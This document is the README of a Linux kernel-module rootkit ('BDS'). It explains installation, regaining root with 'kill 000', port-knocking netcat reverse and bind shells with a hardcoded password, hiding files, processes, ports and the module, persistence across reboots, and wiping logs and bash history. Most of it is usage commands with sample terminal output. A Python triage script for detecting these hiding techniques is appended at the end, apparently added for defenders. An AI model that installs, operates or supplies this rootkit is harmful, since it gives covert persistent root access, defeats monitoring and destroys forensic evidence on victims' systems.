=====BDS LKM ROOTKIT=====
Linux Loadable Kernel Module Rootkit for Linux Kernel 5.x and 6.x on x86_64.
Developed by : Antonius
Website : www.bluedragonsec.com
Github : https://github.com/bluedragonsecurity
This LKM rootkit works on the x86_64 architecture only.
=====FEATURES=====
- hides files and directories whose names start with the prefix bds_
- port knocking bind shell (bind shell password: bluedragonsec)
- port knocking reverse shell
- privilege escalation with the kill 000 command
- hides the bind shell and reverse shell ports from netstat
- hides the bind shell and reverse shell processes
- persistence: the rootkit is reloaded after a reboot
- hides the module
- cleans logs and bash history during installation
=====INSTALLATION=====
You need root privileges to install this rootkit.
If the Linux kernel headers, make and gcc are already installed, run the installer script in direct mode:
./install.sh direct
If the Linux kernel headers, make and gcc are not installed yet, run the installer script without arguments:
./install.sh
=====USING THE ROOTKIT=====
==Privilege Escalation
Once the rootkit is installed on the system, if you lose root privileges you can regain them from an unprivileged shell by typing: kill 000
____________________________________________________________________
robotsoft@robotsoft:~$ id
uid=1000(robotsoft) gid=1000(robotsoft) groups=1000(robotsoft),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare)
robotsoft@robotsoft:~$ kill 000
robotsoft@robotsoft:~$ id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),999(sambashare),1000(robotsoft)
___________________________________________________________________
==Activating Reverse Shell
To activate the reverse shell, start a netcat listener on port 31337 on your machine, then port knock the target server (with the rootkit installed) on port 1337.
On your machine, open a terminal and type:
__________________
nc -l -p 31337 -v
__________________
Open another terminal tab and port knock the target server:
____________________
nc <server ip> 1337
____________________
Wait a few seconds and you will receive a reverse shell connection from the target server on your listener.
Example (the server with the rootkit installed is at 192.168.0.102):
____________________________________________
robotsoft@robotsoft:~$ nc -l -p 31337 -v
Listening on 0.0.0.0 31337
_____________________________________________
Port knock the target IP address (with the rootkit installed):
___________________________________________________
robotsoft@robotsoft:~$ nc 192.168.0.102 1337
___________________________________________________
Back on your netcat listener, you will receive a reverse shell connection:
__________________________________________________
robotsoft@robotsoft:~$ nc -l -p 31337 -v
Listening on 0.0.0.0 31337
Connection received on 192.168.0.102 44052
Linux robotsoft 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
__________________________________________________
==Activating Bind Shell
To activate the bind shell, port knock the target server (with the rootkit installed) on port 1338, then connect to port 31337. The bind shell password is: bluedragonsec
On your machine, open a terminal and type:
_________________________________
nc <server ip> 1338
Wait a few seconds, then type:
nc <server ip> 31337
Enter the password: bluedragonsec
__________________________________
Example (the server with the rootkit installed is at 192.168.0.102):
_________________________________________________________
robotsoft@robotsoft:~$ nc 192.168.0.102 1338
(wait a few seconds)
robotsoft@robotsoft:~$ nc 192.168.0.102 31337
Password :bluedragonsec
Linux robotsoft 5.11.0-49-generic #55-Ubuntu SMP Wed Jan 12 17:36:34 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
__________________________________________________________
==Hiding Files and Directories
To hide a file or directory, give its name the prefix bds_.
==How to Clean Logs and Bash History
Before running the installation script, add each username whose logs should be cleaned to usernames_to_clear_logs.txt, one per line, for example:
_________
root
robotsoft
_________
The logs and bash history of those users are cleaned during rootkit installation.
==Persistence
The rootkit is loaded every time the system boots. After a reboot, wait about one minute for the rootkit to be loaded into the kernel.
==Process Hiding
This rootkit hides the bind shell and reverse shell processes.
==Port Hiding
This rootkit hides the bind shell and reverse shell ports.
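Added example (not code from the BDS rootkit or its README): a defender-side triage script, in Python, that cross-checks the kernel views this rootkit filters. It compares /proc/net/tcp against a bind() probe on the documented shell port 31337, /proc/modules against the loadable-module entries under /sys/module, the /proc directory listing against direct opens of /proc/<pid>/status, and plants a bds_ canary file to see whether readdir drops it. It assumes a Linux host with procfs and sysfs; the SAMPLE_* inputs at the bottom are constructed, not captured from a real machine. Each check only catches the common hiding technique it targets: a module that also removes its sysfs kobject, a hook that filters path lookup as well as readdir, or a shell that is not listening on 31337 at the time will not be flagged.

```python
"""Defender-side triage script (added example, not the BDS rootkit's own code).
Cross-checks each kernel view this rootkit filters against an independent view."""
import errno
import os
import socket
import tempfile

SHELL_PORTS = (31337,)   # the shell port the README documents
HIDDEN_PREFIX = "bds_"   # the file-name prefix the README documents

def parse_proc_net_tcp(text):
    """Local ports in LISTEN state (st == 0A) from /proc/net/tcp text, which is
    what netstat reads and what port hiding usually filters."""
    ports = set()
    for line in text.splitlines()[1:]:          # line 0 is the column header
        fields = line.split()
        if len(fields) >= 4 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports

def port_is_bound(port):
    """Independent view: bind() fails with EADDRINUSE when any socket holds the
    port, listed or not. Ports below 1024 need root (EACCES is re-raised)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(("0.0.0.0", port))
        return False
    except OSError as e:
        if e.errno == errno.EADDRINUSE:
            return True
        raise
    finally:
        s.close()

def hidden_listeners(visible_ports, probe, candidates):
    """Candidate ports the probe finds in use but the kernel listing omits."""
    return sorted(p for p in candidates if p not in visible_ports and probe(p))

def parse_proc_modules(text):
    """Module names (first column) from /proc/modules text, what lsmod shows."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}

def sysfs_loaded_modules(root="/sys/module"):
    """Names under /sys/module that have an 'initstate' file: only loadable
    modules do. Unlinking from the module list leaves this directory behind."""
    return {n for n in os.listdir(root)
            if os.path.exists(os.path.join(root, n, "initstate"))}

def modules_missing_from_list(listed, in_sysfs):
    """Loaded modules present in sysfs but absent from /proc/modules."""
    return sorted(in_sysfs - listed)

def hidden_pids(listed_pids, exists, pid_max):
    """PIDs whose /proc/<pid> entry can be opened although readdir omits them."""
    return sorted(p for p in range(1, pid_max + 1)
                  if p not in listed_pids and exists(p))

def prefix_hidden_from_listdir(directory=None, prefix=HIDDEN_PREFIX):
    """Canary: create a file named with the prefix and check whether readdir
    still returns it; True means directory listings are being filtered."""
    directory = directory or tempfile.gettempdir()
    name = prefix + "canary_" + os.urandom(4).hex()
    path = os.path.join(directory, name)
    with open(path, "w"):
        pass
    try:
        return name not in os.listdir(directory)
    finally:
        os.unlink(path)

def run_live_checks(pid_max_cap=4194304):
    """Live procfs/sysfs views cross-checked (Linux only; the PID sweep takes seconds)."""
    with open("/proc/net/tcp") as f:
        visible = parse_proc_net_tcp(f.read())
    with open("/proc/modules") as f:
        listed = parse_proc_modules(f.read())
    with open("/proc/sys/kernel/pid_max") as f:
        pid_max = min(int(f.read()), pid_max_cap)
    listed_pids = {int(n) for n in os.listdir("/proc") if n.isdigit()}
    return {
        "hidden_listeners": hidden_listeners(visible, port_is_bound, SHELL_PORTS),
        "hidden_modules": modules_missing_from_list(listed, sysfs_loaded_modules()),
        "hidden_pids": hidden_pids(listed_pids,
                                   lambda p: os.path.exists(f"/proc/{p}/status"), pid_max),
        "dir_listing_filtered": prefix_hidden_from_listdir(),
    }

# Constructed samples (not captured from a real host) to exercise the parsers:
# two listeners (0.0.0.0:22 and 127.0.0.1:631) and one established connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1 1 0 100 0 0 10 0
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 2 1 0 100 0 0 10 0
   2: 0F00000A:A1B2 22D8B85D:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 3 1 0 20 4 30 10 -1
"""
SAMPLE_PROC_MODULES = ("ext4 1048576 1 - Live 0x0000000000000000\n"
                       "jbd2 196608 1 ext4, Live 0x0000000000000000\n")

if __name__ == "__main__":
    for check, result in run_live_checks().items():
        print(f"{check}: {result if result else 'nothing found'}")
```

Run it as root on the suspect host. An empty result for every check is not proof of a clean system; it only rules out the four hiding methods the script probes, and the port probe is only meaningful while the shell is actually listening.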